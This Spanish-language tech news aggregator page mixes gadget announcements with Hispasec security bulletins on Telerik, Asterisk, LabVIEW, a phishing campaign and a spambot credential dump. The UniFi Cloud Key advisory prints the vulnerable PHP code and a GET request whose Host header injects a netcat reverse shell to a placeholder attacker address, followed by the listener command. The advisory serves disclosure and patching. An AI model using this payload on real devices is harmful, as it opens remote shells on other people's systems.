You are here

Noticias

Huawei se convierte en la segunda marca más vendida del mundo, superando a Apple

Canal PDA - Wed, 06/09/2017 - 17:34
Según el último estudio Market Pulse de Counterpoint en julio de 2017, Huawei ha superado sistemáticamente a Apple en ventas mundiales de smartphones durante los meses de junio y julio. Con unas sólidas ventas durante el mes de agosto para la compañía china, es posible que Huawei logre un triplete en ventas por tercer mes […]
Categories: PDA / PPC

Actualizaciones de seguridad para Telerik UI ASP.NET AJAX

Hispasec - Wed, 06/09/2017 - 10:00
Se han publicado dos parches para Telerik UI ASP.NET AJAX que solucionan dos graves vulnerabilidades relacionadas con la subida de archivos al servidor y la ejecución de código remoto.



Para los que no lo conozcan, Telerik UI ASP.NET AJAX es una colección de componentes que facilitan el desarrollo de interfaces de usuario Web y móvil. Su uso está ampliamente extendido y ha sido adoptado en numerosos equipos de desarrollo de importantes empresas y organizaciones, como Microsoft, Philips, IBM o Sony entre otros.

Interfaz desarrollada con Telerik UI
Las vulnerabilidades afectan a todas las versiones de 'Telerik.Web.UI.dll' anteriores a la 2017.2.711.

La primera vulnerabilidad, identificada como CVE-2017-11357 afecta al componente RadAsyncUpload, que permite subir archivos al servidor al no validar correctamente las entradas de usuario.

La segunda vulnerabilidad, identificada como CVE-2017-11317 se debe a que 'Telerik.Web.UI' emplea un cifrado demasiado débil para encriptar los datos que recibe RadAsyncUpload, lo que podría ser explotado para subir ficheros arbitrarios y potencialmente ejecutar código remoto.

Se recomienda actualizar cuanto antes a la versión R2 2017 SP2 (2017.2.711) o posterior de Telerik UI para ASP.NET AJAX.



Francisco Salidofsalido@hispasec.com
Más informaciónASP.NET AJAX Insecure Direct Object Reference
http://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference

ASP.NET AJAX Unrestricted File Upload
http://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
Categories: Seguridad

Ametic concede a Seat el Premio al Impulso de las Tic en la Empresa Española 2017

Canal PDA - Tue, 05/09/2017 - 11:16
Ametic, Asociación Multisectorial de Empresas de Electrónica, Tecnologías de la Información, Comunicaciones y Contenidos Digitales, ha concedido a Seat el Premio al Impulso de las TIC en la Empresa Española 2017. El galardón fue recogido por Luca de Meo, presidente de Seat, de manos de Carmen Vela, secretaria de Estado de Investigación, Desarrollo e Innovación […]
Categories: PDA / PPC

Seguridad inalámbrica en el Automóvil: Sensores TPMS

Canal PDA - Tue, 05/09/2017 - 10:36
Una de las áreas de investigación en seguridad informática que más titulares impactantes ha producido en los últimos años ha sido, sin duda, las vulnerabilidades en automóviles. De todos ellos quizá los mas conocidos son la serie de artículos y charlas de Charlie Miller, anteriormente célebre por sus investigaciones de seguridad de Apple iOS. Charlie […]
Categories: PDA / PPC

Actualización de seguridad para Asterisk

Hispasec - Tue, 05/09/2017 - 10:00
Asterisk ha publicado tres actualizaciones de seguridad para solucionar tres vulnerabilidades que podrían permitir a atacantes remotos o en red local revelar información sensible, causar una denegación de servicio o ejecutar código arbitrario en los sistemas afectados.
Asterisk es una implementación de una central telefónica (PBX) de código abierto. Como cualquier PBX, se pueden conectar un número determinado de teléfonos para hacer llamadas entre sí e incluso conectarlos a un proveedor de VoIP para realizar comunicaciones con el exterior. Asterisk es ampliamente usado e incluye un gran número de interesantes características: buzón de voz, conferencias, IVR, distribución automática de llamadas, etc. Además el software creado por Digium está disponible para plataformas Linux, BSD, MacOS X, Solaris y Microsoft Windows.
La primera vulnerabilidad, explicada en el boletín AST-2017-005, permite a un atacante remoto obtener información sensible forzando que se le envíe información multimedia. El fallo tiene su origen en una relajación de las políticas de manejo de RTP, que permitían que una nueva fuente enviando RTP pudiese suplantar una fuente anterior (permitía el cambio de dirección de la fuente). Si la opción de RTP simétrico está activa, la nueva fuente suplantadora recibiría toda la información multimedia del nodo. La solución incluye una serie de mitigaciones y cambios en la política de envío y recepción de RTP.
La segunda vulnerabilidad, descrita en el boletín AST-2017-006, permite a un atacante en red local ejecutar código arbitrario en una shell del sistema. El fallo es un clásico, pasar un comando a la shell usando parámetros no escapados correctamente. De esta forma, se puede introducir un parámetro especialmente manipulado que rompa la lógica de lectura de la shell y permita ejecutar comandos arbitrarios en ésta. En este caso, los parámetros son el nombre de la persona que llama y su número, que son parámetros proporcionados desde fuera y por tanto no fiables. La solución pasa por no dejar que la shell sea la encargada de separar los parámetros entre sí.
La última vulnerabilidad, comentada en el boletín AST-2017-007, permite a un atacante remoto causar una denegación de servicio, haciendo que Asterisk caiga. El problema reside en la lectura de las cabeceras From, To y Contact, que puede fallar al leer una URI especialmente manipulada, tirando el sistema. La solución consiste en reforzar la lectura de estas cabeceras para que no falle con esas URI's.
Las dos primeras vulnerabilidades afectan a Asterisk Open Source en sus ramas 11, 13 y 14 y a Certified Asterisk en sus ramas 11.6 y 13.13, y la última vulnerabilidad afecta sólo a Asterisk Open Source en sus versiones 13.15.0 y 14.4.0. Actualizar a las últimas versiones de cada rama soluciona estos problemas.

Carlos Ledesmacledesma@hispasec.com
Más información:
Media takeover in RTP stack - ASTERISK-2017-005http://downloads.asterisk.org/pub/security/AST-2017-005.html
Shell access command injection in app_minivm - ASTERISK-2017-006http://downloads.asterisk.org/pub/security/AST-2017-006.html
Remote Crash Vulnerability in res_pjsip - ASTERISK-2017-007http://downloads.asterisk.org/pub/security/AST-2017-007.html



Categories: Seguridad

Conviértete en un experto del #PicOfTheDay: claves para destacar en la fotografía móvil

Canal PDA - Tue, 05/09/2017 - 09:09
A pesar del descontento de los más puristas, atrás quedaron los tiempos en los que las fotografías se tomaban con una cámara tradicional. El smartphone, por su rapidez, comodidad y facilidad, ha escalado puestos y se sitúa como el dispositivo favorito para capturar momentos. Pero si además de aprovechar la libertad y espontaneidad del móvil […]
Categories: PDA / PPC

Grave vulnerabilidad en LabVIEW será finalmente parcheada

Hispasec - Mon, 04/09/2017 - 10:00
El investigador Cory Duplantis (@ctfhacker) de la firma de seguridad Cisco Talos, ha hecho público recientemente un reporte de una vulnerabilidad de ejecución arbitraria de código, que afectaría a LabVIEW, y que, tras la repercusión en los medios, el fabricante ha decidido finalmente planificar un parche para solucionarla.

LabVIEW de National Instruments
LabVIEW, de la empresa National Instruments, es una plataforma y entorno de desarrollo para diseñar sistemas, con un lenguaje de programación visual gráfico. Recomendado para sistemas hardware y software de pruebas, control y diseño, simulado o real y embebido, pues acelera la productividad.

La vulnerabilidad 
Según Duplantis , la vulnerabilidad (CVE-2017-2779) se presentaría a la hora de cargar ficheros VI especialmente manipulados.
Este formato propietario (VI), es bastante potente y flexible, por lo que es equiparable a un fichero EXE o DLL, y permite de serie, ejecutar código embebido. El propio fabricante recomienda, por tanto, no abrir ficheros VI provenientes de orígenes desconocidos o no fiables, como pudiera ser un correo electrónico o un archivo descargado directamente de Internet.
Según su investigación, el problema principal reside a la hora de procesar el segmento RSRC del fichero VI y cargarlo en memoria. En concreto durante el proceso encargado del contador de bucle, que podría ser modificado por un atacante para provocar una escritura fuera de límites y elevar permisos de seguridad, permitiendo la ejecución de código arbitrario.
La polémica
Aunque parecía evidente la gravedad de la vulnerabilidad reportada por Duplantis, el fabricante comunicó a Talos que no iba a actualizar esta incidencia en su software por no considerarla una vulnerabilidad grave.

Sin embargo, Talos recordaba en su reporte que esta vulnerabilidad (reportada a la firma en enero de este año) era similar a la parcheada por Microsoft y su entorno .NET (CVE-2007-0041) por lo que recomendaba al fabricante tomar las medidas oportunas.  A los pocos días, firmas como 0patch ya estaban ofreciendo micro parches para solucionarlo, e incluso mostraban abiertamente lo sencillo de su solución, tanto en una extensa entrada en su blog, como en éste vídeo: 

National Instruments, ante estos hechos, ha recapacitado y planificado un parche para resolverla, que será liberado próximamente, actualizando además, el listado de versiones afectadas: 
LabVIEW 2017
LabVIEW 2016
LabVIEW 2015
LabVIEW 2014 

Más información: 
Cory Duplantis @ctfhacker https://twitter.com/ctfhacker 
National Instruments LabVIEW RSRC Arbitrary Null Write Code Execution Vulnerability https://www.talosintelligence.com/reports/TALOS-2017-0273/ 
Vulnerability Spotlight: Code Execution Vulnerability in LabVIEW http://blog.talosintelligence.com/2017/08/vulnerability-spotlight-code-execution.html 
Incomplete RSRC Validation in LabVIEW http://www.ni.com/product-documentation/54099/en/ 
Security Best Practices for LabVIEW VI Files  http://digital.ni.com/public.nsf/allkb/ECCA13EDE2300EFA86257FE100747965 
0patching the RSRC Arbitrary NULL Write Vulnerability in LabVIEW (CVE-2017-2779)  https://0patch.blogspot.com.es/2017/09/0patching-rsrc-arbitrary-null-write.html
Categories: Seguridad

Campaña de "boletos" fraudulentos afecta a Iberia y Ryanair

Hispasec - Sun, 03/09/2017 - 10:00
Desde el laboratorio Hispasec queremos alertar de una nueva campaña de scams o estafas a través de Internet dirigidos a empresas españolas, que al igual que pasadas campañas (como la que ya comentamos en 2015 y que afectó a Mercadona, entre otros) utilizan el correo electrónico y Facebook como vector de propagación. 
Campaña de boletos fraudulentos de Iberia
Este tipo de campañas tienen como objetivo principal recolectar datos privados (nombre, email, edad, dirección...) de los visitantes para utilizarlos en campañas de spam posteriores y sobre todo, para poder obtener sus números de teléfono móvil y suscribirlos a servicios Premium de pago.Debido a la mala praxis de muchos usuarios al aceptar las condiciones y términos de servicio sin leerlos previamente, el visitante incauto puede caer en suscripciones indebidas y el cobro de servicios abusivos.Todo estos datos recolectados crean un perfil bastante completo sobre el visitante que es vendido a terceros, por lo que continúan llegando publicidad bien por correo, bien por SMS. Detrás de estas campañas siempre hay grupos de spammers que utilizan y reutilizan kits fácilmente modificables y empresas de dudosa legalidad, ligadas a este mercado que facilitan las plataformas necesarias de venta de clicks y visitas para publicidad.
Si nos ceñimos a esta campaña en concreto, que afectaría a Iberia y también a Ryanair, los dominios involucrados son los siguientes:
* hxxp:// iberia-usa .us
* hxxp:// iberia-fly .us
* hxxp:// iberiasep .us
* hxxp:// www. iberiaes-ticket .us


En un primer acceso, la campaña nos pide que nos conectemos a Facebook para compartir el supuesto boleto/ticket, y así poder propagarse rápidamente mediante nuestro "timeline".



El último paso, si aceptamos el supuesto "Like" nos redireccionará a un segundo dominio de scam, donde dependiendo del país desde que lo visitemos, nos mostrará una campaña u otra. Actualmente para los visitantes españoles muestra un scam de Ryanair, donde se piden datos privados, teléfono incluido y que es la parte más peligrosa en términos de spam posterior y monetarios dado el caso.



Desde nuestro laboratorio recomendamos encarecidamente ser precavidos y no rellenar ningún tipo de dato privado en cualquiera de estas campañas y aplicar el sentido común.

Recordar también que desde Hispasec y gracias al servicio Antifraude, ofrecemos un servicio integral de detección y desactivación de este tipo de amenazas para evitar el abuso de marca en Internet.
José Mesa Orihuela@jsmesa


Más información:
Promoción falsa: Iberia no está regalando dos boletos por redes socialeshttp://www.nacion.com/tecnologia/Iberia-regalando-boletos-sociales-promocion_0_1638036231.html
Categories: Seguridad

XI Jornadas STIC CCN-CERT

Hispasec - Sat, 02/09/2017 - 09:30
El próximo 13 y 14 de diciembre se celebrarán en Madrid las XI jornadas STIC CCN-CERT, promovidas por el Centro Criptológico Nacional, con el lema Ciberamenazas, el reto de compartir.
Este evento, que ya reuniera en 2016 a más de 1.700 expertos, se ha convertido en un referente en materia de ciberseguridad y punto de encuentro de profesionales, tanto del sector público como de las empresas con intereses estratégicos en el ámbito de la nación.
Los temas a tratar durante el evento versan desde las amenazas avanzadas y persistentes APT, el Esquema Nacional de Seguridad (ENS), herramientas de ataque y defensa, aprendizaje computacional orientado a la ciberseguridad, innovación tecnológica, modelos de compartición de información, el reglamento general de protección de datos (RGPD) y la gestión de crisis.
Para aquellos que deseen contribuir y participar con una propuesta, existe un plazo de presentación hasta el 2 de octubre. El documento para el CFP está disponible aquí.






David García@dgn1729dgarcia@hispasec.com


Más información


XI JORNADAS STIC CCN-CERT
https://www.ccn-cert.cni.es/xijornadas.html

Categories: Seguridad

The Frame, el último televisor de diseño de Samsung, lanza una nueva ventana en 4K para los amantes del arte de la mano del Museo del Prado

Canal PDA - Fri, 01/09/2017 - 12:19
En el marco de la celebración de IFA 2017, Samsung ha presentado una nueva colaboración con el Museo del Prado que permitirá incluir en la galería de su televisor The Frame obras de arte de una de las principales pinacotecas del mundo. El último televisor de diseño que Samsung, que fusiona arte y tecnología, y […]
Categories: PDA / PPC

Yamaha muestra su gran universo sonoro en IFA 2017

Canal PDA - Fri, 01/09/2017 - 11:34
Yamaha, compañía europea líder en la fabricación de sistemas de sonido, acude un año más a IFA, donde expone diversos equipos pertenecientes a su amplia gama de productos, además de hacer partícipes a los visitantes de sus innovadoras tecnologías. Se trata de una de las ferias más relevantes a nivel internacional que este año celebra […]
Categories: PDA / PPC

Samsung Galaxy Note8 se convierte en smartphone oficial de la selección nacional de baloncesto

Canal PDA - Fri, 01/09/2017 - 10:31
Un año más, Samsung apuesta por el deporte español como proveedor oficial de la selección nacional masculina y femenina de baloncesto. Gracias al acuerdo de patrocinio con la Federación Española de Baloncesto, Samsung Galaxy Note8 será el smartphone oficial de ambos equipos esta temporada. “Para Samsung, supone un gran orgullo apoyar a nuestras selecciones masculina […]
Categories: PDA / PPC

El nuevo Smartphone Doro 8040 pone fin a la brecha generacional en la utilización de las nuevas tecnologías

Canal PDA - Fri, 01/09/2017 - 10:27
Doro, empresa sueca pionera en adaptar las nuevas tecnologías a las necesidades de los usuarios del segmento senior, vuelve a apostar por los Smartphones con un nuevo terminal que ayudará a nuestros mayores a que se sumen a los últimos avances en la comunicación de voz y datos. Doro 8040, que se lanza hoy en […]
Categories: PDA / PPC

711 millones de correos electronicos expuestos.

Hispasec - Fri, 01/09/2017 - 10:00
Los investigadores Troy Hunt y Benkow moʞuƎq han descubierto a través de un correo de spam un componente malicioso, localizado en una IP holandesa, que contaba con un gran numero de archivos con información personal. Un total de 711 millones de e-mails con sus correspondientes contraseñas se encuentran comprometidas. La información se ha añadido al sitio web haveibeenpwned para comprobar si tu cuenta de correo se encuentra afectada.
Formato de los correos encontrados en el volcado.
Antiguamente hacer envíos de spam en masa era mucho mas sencillo. Los atacantes buscaban servidores SMTP vulnerables con contraseñas débiles y los utilizaban para enviar spam. Sin embargo, hoy en día existen cientos de empresas y firewalls dedicados a frenar el spam en la red. Además, estos servidores comprometidos se encuentran en una blacklist por lo que no son viables para dicha tarea. 
A pesar de esto, existen dos metodos populares hoy en día:
El primer método es hacer uso de un mailer en PHP en servidores web comprometidos:
  1. El atacante escanea cientos de sitios web hasta dar con varios miles de servidores vulnerables o los compra en el mercado negro.
  2. Utiliza un script en PHP encargado de hacer el envio fraudulento
  3. Todos los servidores estan sincronizados y monitorizados por un panel oculto. 
El segundo método es a través de malware. Este metodo consiste en hacer un software malicioso haga de servidor SMTP permitiendo el envio de correos maliciosos. Cuantos más dispositivos sea capaz de comprometer el atacante, mayor cantidad de spam será capaz de enviar. 
En resumidas cuentas, los atacantes cuentan con dos opciones: Crear su servidores SMTP o comprarlos.
En la última campaña de Ursnif el atacante el atacante se dejó por error un directorio expuesto perteneciente al Command and Control del spammer. En este directorio, existían más de 40GB en e-mails. Entre ellos, se incluyen:
  • Credenciales email: contraseña en texto plano.
  • Enorme lista de correos electrónicos.
  • Configuración del spambot.

Infraestructura de un spambot

Si quieres comprobar si te encuentras afectado por este volcado, puedes hacerlo introduciendo tu dirección de correo electrónico en haveibeenpwned.com
Fernando Díazfdiaz@hispasec.com@entdark_
Mas información:
From Onliner Spambot to millions of email's lists and credentialshttps://benkowlab.blogspot.com.es/2017/08/from-onliner-spambot-to-millions-of.html
Inside the Massive 711 Million Record Onliner Spambot Dumphttps://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
Categories: Seguridad

El nuevo Philips 65” OLED de la Serie 9 convierte el televisor en arte

Canal PDA - Fri, 01/09/2017 - 08:41
Arte en el televisor o el televisor como arte. Ya no hay necesidad de elegir gracias al lanzamiento del nuevo televisor Serie 9 OLED de 65” de Philips, un conjunto que es tan impresionante como las imágenes que recrea. Este nuevo televisor Philips combina la última tecnología OLED con el motor Philips TV P5 Perfect […]
Categories: PDA / PPC

Command Injection en Ubiquiti Networks UniFi Cloud Key

Hispasec - Thu, 31/08/2017 - 16:00
Ubiquiti Networks desarrolla tecnologías de redes de alto rendimiento para empresas y proveedores de servicios. La plataforma se enfoca en ofrecer soluciones avanzadas y fáciles de implementar.

Existe una inyección de comandos a través de la cabecera de una petición GET en la versión 0.6.1 de UniFi Cloud Key. Esta vulnerabilidad puede ser explotada cuando la interfaz de Cloud Key está expuesta a Internet y un atacante tenga las credenciales.

El código responsable de esta vulnerabilidad es:
function is_unifi_running() {
   if (!isset($_SERVER['HTTP_HOST'])) {
           $c_host = $_SERVER['SERVER_ADDR'];
   } else {
           $c_host = $_SERVER['HTTP_HOST'];
   }
   $unifi_href = 'http://' . $c_host . ':8080/status';
   exec(CMD_CURL . $unifi_href, $out, $rc);
   if ($rc == 0) {
       return true;
   }
   return false;
}

La variable $c_host no está filtrada y esto hace posible la inyección de código. La siguiente petición GET puede ser usada para abrir una reverse-shell.

GET /api/status HTTP/1.1
Host: SERVER_ADDRESS;busybox nc ATTACK_ADDRESS 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
X-Access-Token: <Token>
Referer: https://SYSTEM_ADDRESS/login
Cookie: CKSESSIONID=<Session-ID>
Connection: close
El atacante sólo tiene que ejecutar netcat con los siguientes parámetros
$ nc -lvp 8999
Para arreglar esta vulnerabilidad se recomienda actualizar a la versión 0.6.4 o superiores.

Mario Parramparra@hispasec.com
Más información:

UBIQUITI NETWORKS UNIFI CLOUD KEY AUTHENTICATED COMMAND INJECTION
https://www.sec-consult.com/en/blog/advisories/ubiquiti-networks-unifi-cloud-key-authenticated-command-injection/index.html
Categories: Seguridad

Philips destaca en sus innovaciones en IFA 2017 el cuidado de la salud y la mejora de la vida de las personas

Canal PDA - Thu, 31/08/2017 - 12:18
En esta edición de IFA en Berlín, Alemania, Royal Philips (NYSE: PHG, AEX: PHIA) ha presentado nuevos productos y servicios que permiten al consumidor ser parte activa en el cuidado de su salud y bienestar sacando el máximo partido a su vida. Los aspectos más destacados de la compañía durante esta feria internacional de la […]
Categories: PDA / PPC

Acer presenta cámaras de 360º, rastreadores de mascotas y PC

Canal PDA - Thu, 31/08/2017 - 12:06
IFA2017, BERLÍN: Acer ha inaugurado las ruedas de prensa de IFA con la presentación de varios productos nuevos, entre los que figuran cámaras de 360º con conexión LTE y dispositivos para propietarios de mascotas. La Acer Holo360 (en la foto) utiliza la Plataforma de Cámara Conectada de Qualcomm con un procesador móvil Qualcomm Snapdragon 625. […]
Categories: PDA / PPC

Qualcomm Brings Fast, Exceptional Connectivity to Samsung Premium QLED TVs

Canal PDA - Thu, 31/08/2017 - 10:29
Qualcomm Incorporated (NASDAQ: QCOM) through its subsidiary, Qualcomm Technologies, Inc., today announced that its home entertainment solution QCA9379 is powering the connectivity in Samsung QLED TV product line. The QCA9379 is a combo chip with support for dual-stream Wi-Fi 802.11ac and Bluetooth, enabling Samsung’s premium flagship QLED TVs to support interactive and engaging media experiences.“Our […]
Categories: PDA / PPC

Planifica y personaliza el mejor viaje por carretera de la mano de TomTom y TripAdvisor

Canal PDA - Thu, 31/08/2017 - 10:14
TomTom (TOM2) acaba de anunciar las novedades en TomTom Road Trips, la plataforma gratuita que permite a los viajeros descubrir las mejores rutas por carretera del mundo. Ahora, con cien rutas por descubrir, los conductores también podrán encontrar y reservar los mejores lugares para comer y pernoctar gracias a la colaboración con TripAdvisor, a partir […]
Categories: PDA / PPC

Pages

Subscribe to Bytecoders aggregator